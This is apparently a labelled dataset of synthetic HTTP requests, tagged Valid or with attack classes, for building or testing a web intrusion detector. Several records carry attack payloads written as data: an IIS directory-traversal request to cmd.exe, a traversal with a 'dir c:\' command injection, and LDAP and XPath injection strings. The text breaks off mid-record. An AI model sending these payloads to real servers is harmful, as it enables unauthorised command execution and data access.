Accept-Charset: windows-1254;q=0.4, iso-8859-2, iso-8859-9;q=0.0, x-mac-icelandic;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=7
Client-ip: 200.252.94.25
Cookie: inputDor2tmp=rxcn;an=eS3 3>syR;nso=eIlwe5tef;urasaHpmBssms=86094;ipaeuonri=72453
Cookie2: $Version="695"
Date: Wed, 30 Mar 05 08:21:03 CET
ETag: W/"uqrlVultJdDyCTofYQ"
Expect: 100-continue
From: tnsjx@nvlaoadtiu.st
If-Modified-Since: Thu, 03 Jun 04 18:07:32 GMT
If-Unmodified-Since: Fri, 26 Dec 08 04:50:09 UTC
If-Match: *
If-None-Match: *
If-Range: "bwVpI6qBTcPz7lyL"
Max-Forwards: 9283
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM ZU5ud090cmxzMWR0cmFhY2V0YWVsbm9pcHdlbGR0dHN0czJyMmJtbG5zbHQ=
Authorization: o6Tr hogeh2i=ilumdPB
Range: 845-,0-,-57
Referer: http://baie.net/dehsem/aebndcsr/te6fiaWc/thttm5n.htm
TE: chunked;q=0.8,trailers
Trailer: TE
User-Agent: Mozilla/5.5 (X11; U; Linux i386 5.0; ti-l8; rv:3.1.4) Gecko/19670089
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0954x9922
Via: HTTP/7.0 www.alr0ye.jpg
Transfer-Encoding: gzip
Upgrade: meE/0.7
Warning: 125 www.knwtlae.shtml "ad0et9kU3d4n6SuMdtN" "Thu, 30 Sep 04 09:26:08 GMT"
X-Forwarded-For: 75.214.139.60
X-Serial-Number: 63208652767395
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11808
Start - Id: 31363
class: Valid
GET /FikACJ4XpNm8nph-hv/likeY40s5@LXG/etetfcfy1sh.asp?hnctgernet3=oeO&doriiAen=555048&TEonxyui5ueixE=1384926&euiDPed4n=vbVx&tfcedjS2rEehl=fdi&4ctdv=902&tciadiHd=wor%3D&kdNdRla3r9ebrh=7rsG&7yDlkpFlocation=httpsa&9qofma7Z=1grc%40sle%5Cpassthruued&I4drm7Ne=b8z HTTP/1.0
Host: 151.152.207.186
Connection: close
Accept: audio/*, application/rtf
Accept-Charset: x-mac-arabic, cp-932, iso-8859-3;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: 8str-sas, rat-I0eaeh3;q=0.9
Cache-Control: 9=ftte
Client-ip: 123.99.49.204
Cookie: ela=Estyleh;rwud=7151329;aeHwO=9
Cookie2: $Version="38"
Date: Thu, 28 Apr 05 20:47:30 CET
ETag: W/"QD7G_upMUzYLHZ4"
Expect: 100-continue
From: ertro@3cIlsoRsD5.cz
If-Modified-Since: Fri, 12 Oct 07 06:48:00 CET
If-Unmodified-Since: Fri, 30 Oct 09 20:14:00 CET
If-Match: "TtEEyIfT3Z8urLks"
If-None-Match: "lU2HtNZh3WW2.6RW-"
If-Range: "PuBGgKLFqEtIGus_"
Max-Forwards: 8
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic ZTVzaGlvOmVhOXdlYTA=
Authorization: NTLM ZWFlYXRob2U3cnpkaVNUb3RzYWY4ZzZtY3Q2VGlpY2FlaW1vcnRkZDVu
Range: 8-,2512-,696-3957
Referer: http://eoG1r8kh.cz/seysory/lcTppr/jCnyia2h/vreEtn.js
TE: trailers,deflate,deflate;q=0.7
Trailer: TE
User-Agent: amNanE0so
UA-CPU: x86
UA-Disp: 2596,238,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 7934x883
Via: uem59/8.9 78.206.52.32, FTP/0.2 www.emOnsmel.htm, 9.3 93.219.131.199:98
Transfer-Encoding: D3eprL; SWturi=ayur
Upgrade: tnrpho/3.2, oePO/9.4, pnEdrr/9.5, kusAni/0.3, dhhopl/0.1
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 56784
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31363
Start - Id: 9003
class: Valid
GET /rDnyV7QFvq.tiff?GGrxp_=n%3Ank&0u_wp-=ftIv%7E%5Dpsmt8e3&qckeysq7yuee=em8eTe&v4id9Rw3Ibgotr8=lJUMRM4n1&hrdsmezhbesnd=31&wivrroa8neuh=a&nnddqsgte=etEeplk5Erubinstyleeean&naEpfatmeony=wautoexecsim HTTP/1.1
Host: 2.96.244.81:80
Connection: keep-alive
Accept: application/postscript;q=0.3, image/*;q=0.5, audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: sieO=dfAs
Client-ip: 50.124.25.51
Cookie: ury9eaoasierSr=22;uadfgbitEncui=sselilocationef6;FdAqJ.4hJ=iP6ms6oe@Ur;fitQ6OelnoeobE=apu9t&]w6?6telnetr;xod=iid;rr=41
Cookie2: $Version="153"
Date: Tue, 27 Jun 06 19:54:13 GMT
ETag: W/"Zd4TEEiadfEZVn1TSmFm"
Expect: 100-continue
From: lstucdNi@eei2smta.net
If-Modified-Since: Sun, 28 Feb 10 11:42:07 UTC
If-Unmodified-Since: Thu, 24 Dec 09 24:07:05 UTC
If-Match: "NU@8nOYBdfbPTJTs"
If-None-Match: "xAF2L_kfgcLzom7nAU"
If-Range: "Ph3R8js68YUIFelq"
Max-Forwards: 643
MIME-Version: 6.2
Pragma: r='isicm185'
Proxy-Authorization: lsSh2 t9tteeo=y7a2ree
Authorization: hzpnip ADlaao=mcDudt
Range: 083-
Referer: http://otddtdot.de/s7xyaEOr/nttrdei/hnor.pl
TE: chunked;q=0.8,gzip
Trailer: If-None-Match
User-Agent: Mozilla/3.6 (Windows; U; WinNT 0.3; sg-4j; rv:0.3.4) Gecko/84781932
UA-CPU: MIPS
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7350x9086
Via: 6.9 www.Ae8iti.html, HTTP/6.0 www.todm3.js
Transfer-Encoding: identity
Upgrade: t7hloe/9.4, 2ku9/0.5, egeiae/4.4
Warning: 145 191.84.114.78 "casehmDc" 
X-Forwarded-For: 253.252.174.31
X-Serial-Number: 92954758156
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9003
Start - Id: 32101
class: Valid
GET /4ehavITNSg/yasThicrsI4/tWPDSjtwhM5wIYiAUux/iRirIWKZKy2QrT/swR.KT/6c-Igl0/ndts4y3ctsdmhen/nTtCeCWtHm/kIt38hbo/eSDyNRdxALNdmy.css?asxrde=rIimgi57i9te&pehEdeTh=fsefbs8oed0%29ai&mAnfaueu=2&wiytihamYR7an=441115&0eeo=082734181&itgY8ryhis1=vQPFe5Pnz&fvbe=24921428&o1we0=%3C%3Dtohqwbetween6an+orV&aTCsTformXbn0R=155653&ri1EeueiiCr=c+ai&NwsOwhereInW=idrERtzjBxTG&neutcn=3187092&nexecwgFovjB=nb&nrtsRvtr=n5dRXIFO.s&5JU.YRaX3MMq=39086 HTTP/1.1
Host: 229.47.214.113
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 221.119.104.99
Cookie: eemt=o;a1Etuiv=402749;Erwsn5adqd=aeqaeu
Cookie2: $Version="102"
Date: Mon, 28 Jan 08 17:51:29 UTC
ETag: "D_Ls_R7aeBy36JCM7s"
Expect: znnrtj=5seob7w;erlhsae=uifl
From: ho8otO@ipig.gov
If-Modified-Since: Wed, 23 Aug 06 15:45:21 GMT
If-Unmodified-Since: Fri, 13 Jun 08 10:42:12 CET
If-Match: "jc1HMkTAmlO-UGIew"
If-None-Match: *
If-Range: Sat, 28 Jan 06 09:23:34 CET
Max-Forwards: 8
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic ZXNvbHRybzphRk9p
Authorization: Digest nc=88f8306e
Range: 130281-,-02625
Referer: http://enYDiS.it/DCso/sbttse/ektnso/unci.php4
TE: trailers,trailers
Trailer: If-Match
User-Agent: iddas/2.7
UA-CPU: 68000
UA-Disp: 3488,5746,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 367x7496
Via: FTP/0.7 www.hkaeAti.html, HTTP/7.6 75.174.214.92:93
Transfer-Encoding: gzip
Upgrade: ipadO/5.2, lbr/9.1, 5Dq/1.2, al1/0.6, aCann/7.0
Warning: 904 243.231.55.119 "ogsigutei2fytsRtea0e" "Wed, 09 Feb 05 05:13:25 UTC"
X-Forwarded-For: 111.76.107.196
X-Serial-Number: 4047270
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32101
Start - Id: 44979
class: PathTransversal
GET /Sietttonnaatidyl/cMijjm3gySkYMx9/QK2IVJaccess_log/mXYN3q/8O2IidtGPandlocation/S5isbVumdlc/DVDmocha7perlbxoK4e6/aSJ1BJ0m7SF/ci.jpeg?ecoheib5=%40t%3F6i&39faiumlsbnhh3I=7dT5%28c&taa=a0Ast%3F&2l0igwgm=collection%28+++file%3A%2F%2F%2Fc%3A%2Ftis%2Flddic.xml%29&iwhirTpmn1aws=ekew&Co1r=2679&mNaifeaotH=nlhea&sery=oa%25usr&mdlce=1901552&rpu=ofs HTTP/1.0
Host: 231.104.144.242:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1254;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 64.160.89.221
Cookie: nfse99=72458279;aahY=40atA5hlooO<;ycstoh9gntt=Des;ynt-it.dhZposition=Eruhscuwe4b;tiEranoaeI23=o
Cookie2: $Version="2"
Date: Sat, 18 Apr 09 15:08:44 GMT
ETag: "cQYNQi481EW5_Y7"
Expect: wpte
From: tsdma@neiban.be
If-Modified-Since: Sat, 27 Dec 08 21:00:23 UTC
If-Unmodified-Since: Mon, 17 Jan 05 15:03:07 GMT
If-Match: "gROhg9XHagzDGrpkSrrw"
If-None-Match: *
If-Range: Thu, 08 Sep 05 12:13:08 UTC
Max-Forwards: 5653
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: dlEa onhra=asubH
Authorization: nrmt eelgn=eieeew
Range: 73-,999598-14093
Referer: http://6diemg.it/osAsnkse/sduytn.sh
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/4.7 (X11; U; Solaris 8.0; au-tr; rv:7.0.1) Gecko/61827136
UA-CPU: 68000
UA-Disp: 272,747,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: thes/2.8 65.240.220.222
Transfer-Encoding: gzip
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 066 www.nilrhde.jpg "jrIghnmascnrodusoxo" "Thu, 06 Oct 05 03:19:48 UTC"
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 88070194263
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44979
Start - Id: 7229
class: Valid
PUT /dsautduakx/ticnlMbard1uen/rxxlx/p8/im32/nos/zDm0Rp0SjAi/8t.cgi? HTTP/1.0
Content-Length: 96
Content-Language: bdse,sntt,islHv
Content-Encoding: identity
Content-Location: /tmlEadea.exe
Content-MD5: aWxDcm1iZW90aWlvc2VoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 13 Jul 07 24:40:17 GMT
Last-Modified: Sat, 06 Oct 07 11:19:44 GMT
Host: www.iwaGpT7.com:21
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 200.243.148.8
Cookie: TmY=09;Ao3t0rtnyt=f39r+;ircwssgndlnoied=cF3KgL09
Cookie2: $Version="340"
Date: Sat, 27 Feb 10 11:41:28 GMT
ETag: W/"CXAljVW.aYONgno@TIm"
Expect: rri96osu
From: seKsui5@tneeaatdac.fr
If-Modified-Since: Thu, 15 Sep 05 05:28:16 GMT
If-Unmodified-Since: Fri, 17 Aug 07 21:43:48 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Nov 09 04:11:50 CET
Max-Forwards: 4
MIME-Version: 6.6
Pragma: S=olequu
Proxy-Authorization: Basic ZHV0dTpvUWR0U3o=
Authorization: nlt3Oh 8issjt=tyseo
Range: 7717-
Referer: http://ebnnema.be/alxeus/9ndeli.asmx
TE: trailers,trailers,chunked;q=0.3
Trailer: Range
User-Agent: Mozilla/0.9 (compatible; Konqueror/9.5; Linux i586; dee4iuCh; jj5d)
UA-CPU: 68000
UA-Disp: 5578,6674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 629x010
Via: 6.3 28.254.41.117, 7.7 www.ctseeH.png:74109
Transfer-Encoding: gzip
Upgrade: qtiUn/4.0, erx/6.5, 6el/5.2, CbtgHd/4.1, eolItq/5.0
Warning: 676 www.hooAenjp.htm:218 "aqnEtosob2" 
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Lahei4tYr=lfFrLYIlYl&ntnieo=lQAX&zebeooI=ietsi&1Awa3tefwwwQ=9197&ltFp@x=lf&wefn2jBbleora=zokbonI

End - Id: 7229
Start - Id: 44377
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 63.81.189.186:80
Connection: keep-alive
Accept: audio/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-stale=388
Client-ip: 90.164.80.82
Cookie: X2ncYY=r 9elh ;trHxneed8rcdexd=shyduc8;sNevcNoc=226157693;stahhedmenlest=ek;sDaDe=]E
Cookie2: $Version="75"
Date: Mon, 15 May 06 21:23:46 UTC
ETag: "hRtyES0J8kvkJHkX"
Expect: sHulneie=8tshds;ergxc
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Thu, 29 Oct 09 15:31:55 CET
If-Unmodified-Since: Sun, 14 Feb 10 15:30:07 GMT
If-Match: "T4zlc4FMAAGr3y8"
If-None-Match: *
If-Range: "4SoVXSAvOO8jfGxd"
Max-Forwards: 5
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Basic YlJoZWlnOjN6aW5lR2I=
Range: -592489
Referer: /tn4eoN/zogt/apze/39glm/nestibrn.php
TE: trailers
Trailer: Cache-Control
User-Agent: xqe0a5i (p_x0xqoC)
UA-CPU: Sparc
UA-Disp: 0327,603,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 347x4806
Via: 5.4 240.50.136.50:26, 5.6 www.4a0wid.css
Transfer-Encoding: deflate
Upgrade: HeiarI/6.4, enio/6.7, DHqogf/0.4
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44377
Start - Id: 25545
class: Valid
GET /n3Fi0lE8PSkAH/hp0GkEFTcl_/FXexecdeleteC.JtAmUdXg./44x/muxTu71h5T56/vRAhO9/hatrssdjeiey/QnjsA7iL/tRbd_6AekQ.asp?3hzehhlo=n0frs%5D&mh_Dprocessing-instruction9Zinclude5=DhcRr&ohSaw5jgd=kss4uhrsdt&oKo6sc=rHmohEtilWenun&iqd=hLtz&5kjoLtE=2277&iYfnatPte6keoa=9rtLBlNP&jwtbetSltsll=knd+&mtssnhs5b=%29owget&7eddtiea=d HTTP/1.0
Host: www.2mioAhna.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 22.166.212.236
Cookie: ni=nelperla;te7uO7elpxnz=ievalhq;Uw1OLHYTNjP=ccsz;j_2ML=emnstieoe5;meQhlxcauyvt=Necr2tttcgtyt;8lstorromatyI=6hazsr
Cookie2: $Version="1"
Date: Mon, 20 Sep 04 01:56:42 CET
ETag: W/"w3lkaWqMbIWgsfOEYZF9"
Expect: 100-continue
From: iisl@HkElln.cz
If-Modified-Since: Fri, 09 Jun 06 10:38:09 UTC
If-Unmodified-Since: Wed, 09 Aug 06 20:36:33 GMT
If-Match: "JVzzeJHE6WS9Bk5"
If-None-Match: "j2gBJjH416wJS4AlHdx"
If-Range: *
Max-Forwards: 4
MIME-Version: 6.4
Pragma: nWv=PoltPrh
Proxy-Authorization: ntlrt msoetln=heso
Authorization: she0tk Ctarti3o=uhrc
Range: 9-,-76849,526527-658
Referer: http://www.4tay.biz/3btxe/nbdqdtl/ewbCb/d4A8snt2/nceixrs.swf
TE: gzip
Trailer: Date
User-Agent: vrwffmmayflE
UA-CPU: MIPS
UA-Disp: 0510,736,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8556x2731
Via: FTP/4.5 162.253.74.197, 0.0 165.33.162.106
Transfer-Encoding: 9rfdAh; 10sr=ornyQe
Upgrade: tOa/0.8
Warning: 142 222.56.226.72 "tngnIadabbtID" 
X-Forwarded-For: 161.67.138.114
X-Serial-Number: 5960932931614
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25545
Start - Id: 38149
class: LdapInjection
GET /oeocof5oi/fD5g1Jc3O/imgJ9Ll.Bb_GtmpCSS/fhiEfigni/r89sg/xautoexecHk5-/0hn/aezhlkiwmiykoit.php4?kc0wbiYAY=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&ehdhNoa=56847166&5dtztLoItl=slR6t&rlecs8Ui0=tgmoonCiqtedclsvs&ahE=m0pdrl&Haeokn_-orcp=0000&0ciioasKok=dbwrOteimed&Ft4IqxMFb.=9096852259 HTTP/1.0
Host: 49.224.9.1
Connection: ro4nroy9
Accept: */*
Accept-Charset: koi8;q=0.3
Accept-Encoding: compress;q=0.7
Accept-Language: *
Cache-Control: hdinrneh=zer
Client-ip: 106.203.232.28
Cookie: E6dke_A_U=06716;betweenscript5andV7F60=430511;1N=etwtHsenel1irTc;nreo1hs=etIecgo9atCeia
Cookie2: $Version="16"
Date: Tue, 31 May 05 23:18:06 CET
ETag: "Ptct44HXIkgtS5In"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Wed, 26 Apr 06 21:48:12 GMT
If-Unmodified-Since: Fri, 27 Feb 09 07:06:25 GMT
If-Match: *
If-None-Match: "yE5A4_VNrFoYm_2TQ"
If-Range: "y4SrPA97Vx05HYP3"
Max-Forwards: 6
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic YWVhbjplamVlY2hjbg==
Authorization: xct8c5 846awn=haepm
Range: 652463-080254,-92,5914-088
Referer: http://www.cdc6tei.fr/eneit6ns/rewamm/dVshtg.gif
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.5 (X11; U; Open BSD i586 0.8; tx-lk; rv:1.5.8) Gecko/66439256
UA-CPU: StrongARM
UA-Disp: 651,9493,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9560x3335
Via: eys/5.7 www.Ee2qe.js, FTP/2.1 www.nw2e.css, 9.3 www.eonr1lzr.tiff
Transfer-Encoding: gzip
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 700 216.4.11.243 "oisttasyiausek4esAB8" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38149
Start - Id: 31453
class: Valid
GET /q8ctes3l2nfadniebr/0eNipn/e6yltT9helaoCee/kTc85_9.qjL5G/eCKasIhHHp6ibSW_N/d7aiisea/q1yPt/bKYkNo3-4u/Ud0gPacceptjDc.php3?apu2eoasoas=4685&rsceno=05348&svtdoceoh=930772664&5jEt0e=524515&aFllO=1eilgismepiednneI6&ce=4cstd1das&iE=8&sqtmpGCIP=hlsYL4ec%25uygvGmochafr4ooe&presswnh=212065 HTTP/1.0
Host: 234.125.85.67
Connection: keep-alive
Accept: audio/x-wav;q=0.2, video/quicktime, audio/basic
Accept-Charset: *
Accept-Encoding: compress;q=0.7, identity;q=0.2, compress;q=0.3, deflate, compress
Accept-Language: *
Cache-Control: max-age=44
Client-ip: 251.240.231.143
Cookie: UahesEea=ko17'$Ibe;r7atrHesoc=nle;rruat=lXNsicXCP;4NdK1NSr=02
Cookie2: $Version="037"
Date: Wed, 15 Jun 05 18:08:54 GMT
ETag: "l_xvqvivFPH5kQ2Tujo"
Expect: ribt4ui=elerna6a;up7ar5i=Ltenaeu
From: vconid@sswn.net
If-Modified-Since: Fri, 11 Feb 05 19:52:17 CET
If-Unmodified-Since: Tue, 04 Sep 07 04:05:49 CET
If-Match: "oW9WYTt0Wqy79ib"
If-None-Match: *
If-Range: Wed, 26 Nov 08 12:02:39 CET
Max-Forwards: 7900
MIME-Version: 2.0
Pragma: Mvoe=lnOetbhr
Proxy-Authorization: NTLM ZWV4cmhqdGFhcm1wcFNjNnVnZWxpeW5lYTlobHJ4Q0hkRXQ=
Authorization: NTLM bmF3bmlhcWVlZXEyYWhydWdEcjhlbjIzb2FUeDdyZWU=
Range: 8-388473,6-
Referer: http://dsU9eonl.be/3Iieo/tsEp/nevha4e/tudnn/msa8al5.php
TE: gzip;q=0.0,deflate;q=0.4
Trailer: Host
User-Agent: Mozilla/9.5 (Windows; U; Win98 8.8; nw-No; rv:1.9.1) Gecko/39915123
UA-CPU: MIPS
UA-Disp: 4201,0533,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 389x351
Via: HTTP/4.8 www.dDeen.html:3000, 4.6 90.175.201.188
Transfer-Encoding: identity
Upgrade: tJfsle/8.9, ioe/7.1, sOilo/7.7, ncnoes/3.0, has/9.5
Warning: 765 24.36.202.0 "ajeMEawyotisp" 
X-Forwarded-For: 187.213.56.17
X-Serial-Number: 1337403720563308
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31453
Start - Id: 6454
class: Valid
PUT /r5MEJWEoGV6_Wy96q/ckUGmSWvstD/eoAo/qyq/zheagot.msf? HTTP/1.0
Content-Length: 124
Content-Language: oCn
Content-Encoding: identity
Content-Location: /wphchega/leiape/98sgh/esAlUn.exe
Content-MD5: ZWV0dGVkZWhnRGljbWVhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 May 09 23:03:07 UTC
Last-Modified: Sun, 08 May 05 13:38:11 GMT
Host: www.eeean.fr:80
Connection: 4oaUntoa
Accept: image/*;q=0.4, audio/basic
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=72920
Client-ip: 174.238.79.189
Cookie: lphn1Bv05onicdb=e;scneo4nhepTg7f=0hsdrotwrtrtfaeroe;C9C@6Is9IM=983;heds10qat=ity5;M6=5
Cookie2: $Version="601"
Date: Wed, 08 Aug 07 21:37:20 GMT
ETag: "kPFsYvPUuAuZ9Q93z.uJ"
Expect: 100-continue
From: aVFabc@O7fpolootx.be
If-Modified-Since: Fri, 09 Dec 05 13:34:15 GMT
If-Unmodified-Since: Wed, 31 May 06 08:36:58 GMT
If-Match: "a2aoYvy8V2xqP1LcKcI"
If-None-Match: "2AuK3_ArIb4Jrvc0."
If-Range: "qhK5Y-L26SP@FsYjU"
Max-Forwards: 7
MIME-Version: 3.4
Pragma: u9tajlm='c7rnbm'
Proxy-Authorization: Basic bmxpZW1lZTpFeWFhYQ==
Authorization: Basic b3BveWd0OmhFY1pvb2g=
Range: 35260-775435,47-,92-626366
Referer: http://www.nTges7ys.org/aaesuua/ealtmi.rar
TE: gzip
Trailer: From
User-Agent: Mozilla/1.9 (compatible; aeeBeRThn; Win98; teef)
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8174x6805
Via: snsrse/1.2 237.186.210.218, 7.3 www.ihbidp2b.jpeg
Transfer-Encoding: compress
Upgrade: e0o/2.6, hfi/6.9, wued/6.3
Warning: 447 37.2.170.213 "8reqteinidDfS9tu7r6" "Mon, 13 Mar 06 18:40:21 UTC"
X-Forwarded-For: 218.75.218.198
X-Serial-Number: 003791
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

he4keko=rx9&as3eieIeeieed==tf ac&tttytiniu=e$&foa8tpgesZ9=ucog&pidnetati=0nRhEltevalo&ou=xhnRaggdAhHee0bee&r6aeda=r|rd

End - Id: 6454
Start - Id: 35910
class: XPathInjection
POST /d45wqooeWmMFFLTQ/aFih6DinIs3uoe.htm? HTTP/1.0
Content-Length: 198
Content-Language: dt
Content-Encoding: gzip
Content-Location: http://dpser.uk/qOl0oonn.tar.gz
Content-MD5: bmlub3RyMTdtT21vMWVQaQ==
Content-Type: application/x-www-form-urlencoded
Host: www.lNua.com:80
Connection: gueef
Accept: application/*;q=0.5
Accept-Charset: shift_jis;q=0.5, windows-1251
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 62.209.148.254
Cookie: xycHcb=unciallu\+kaso<;ieeserosre=taa'    or    path/child::node()[position()=N] or   'hthpaEs' = '
Cookie2: $Version="93"
Date: Sat, 22 Sep 07 05:51:39 GMT
Expect: 100-continue
From: 5ixneda@rqhrvad.be
If-Modified-Since: Thu, 29 Mar 07 07:35:11 GMT
If-Unmodified-Since: Thu, 12 Apr 07 01:00:50 CET
If-Match: "r5TBTdC9Em.ih.T3Hmo."
If-None-Match: *
If-Range: "yJhAeWxHMp5moXR"
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: a6ocet tbqE20r=l91ubeei
Authorization: Digest qop=wkSts
Referer: /gpRqef/ioml/3rnjr/ngpuOtta/qlHsN.cgi
TE: chunked,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.9 (compatible; MSIE 2.0; Win98; 1oFoZcnsai; nSneh; yofrdote9)
UA-OS: Solaris
Via: aapRpu/1.3 www.47ryctr.gif, 6.5 www.s6rdalt.htm
Transfer-Encoding: ndd63
Upgrade: hiiEt/3.7
X-Serial-Number: 08336160636
----: ------------------------------

spl5rhbi=te4&_htpass42k= sam&o5si=n1q&QtphpF2A4=03659582&R26Djusr=nhh&aay=538&T2tcard=cF&gn=lttBfo27l&eoeorLLus3aa0=fxmlns&njusx7e=EalZeTark5jxcecmr&on=1&ss6et4=egrydhtti6ses&M2di=t/&eDAra=5570110

End - Id: 35910
Start - Id: 44510
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.0
Host: 239.151.244.75
Connection: rait
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 200.92.139.197
Cookie: oA6l2zdhopon=433991;stdinJOTmhv6j=2$;ei1onAnsiSnletl=7e2Nscript+dyud9c:ta
Cookie2: $Version="123"
Date: Fri, 20 Feb 04 11:35:33 UTC
ETag: W/"HcdXasxzouezv38hXg"
Expect: auaEbj2f=ti3z24oz
From: aOaort0e@ftfehuiid.cz
If-Modified-Since: Mon, 04 May 09 20:29:35 UTC
If-Unmodified-Since: Sun, 11 Jan 04 21:19:15 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 61
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM RlBFdGF0dDRhYXd6dHYwdW9zZWVjcjdhbjhvbjRhemJuOHVrcWVlUmw=
Range: 7-42
Referer: http://s4ioitee.cz/E5mnsurt/rn9essi.pl
TE: gzip;q=0.6
Trailer: Via
User-Agent: Mozilla/5.8 (compatible; Rvuenee; Mac OS X; a3gp; frgwqppet)
UA-CPU: PowerPC
UA-Disp: 715,347,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 455x841
Via: HTTP/8.2 189.183.226.152, HTTP/8.6 70.24.243.218, HTTP/9.7 www.edntn.gif
Transfer-Encoding: identity
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44510
Start - Id: 39914
class: SSI
PUT /es/e9KGdeTu8vHQk/eneigS07tsgjTarcott/dOh/ag/db/wmeh7ene7ti7yeoilr24/j0P13T0nNw/oKG.gF/C2ZU2-i.e6jYh5h/Aones9huk.msf? HTTP/1.1
Content-Length: 285
Content-Language: eshpno,ttgu
Content-Encoding: identity
Content-Location: http://w2U4h.fr/NoieqnEu/suec/wtdsi4r/trl4tu/idretmwr.php
Content-MD5: Y2F0QnJkRUV5eW9lZjVsZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Jan 08 15:13:36 UTC
Last-Modified: Thu, 05 Nov 09 11:57:16 GMT
Host: 215.46.127.162:80
Connection: pdmomhmh
Accept: */*
Accept-Charset: windows-1254, iso-8859-1
Accept-Encoding: *;q=0.9
Accept-Language: to-erny, Obrs9te-ni
Cache-Control: nbtvr='Ee'
Client-ip: 239.36.31.16
Cookie: ltstt=Tmh6ndra;9yqraoDYstyle=svbscript
Cookie2: $Version="524"
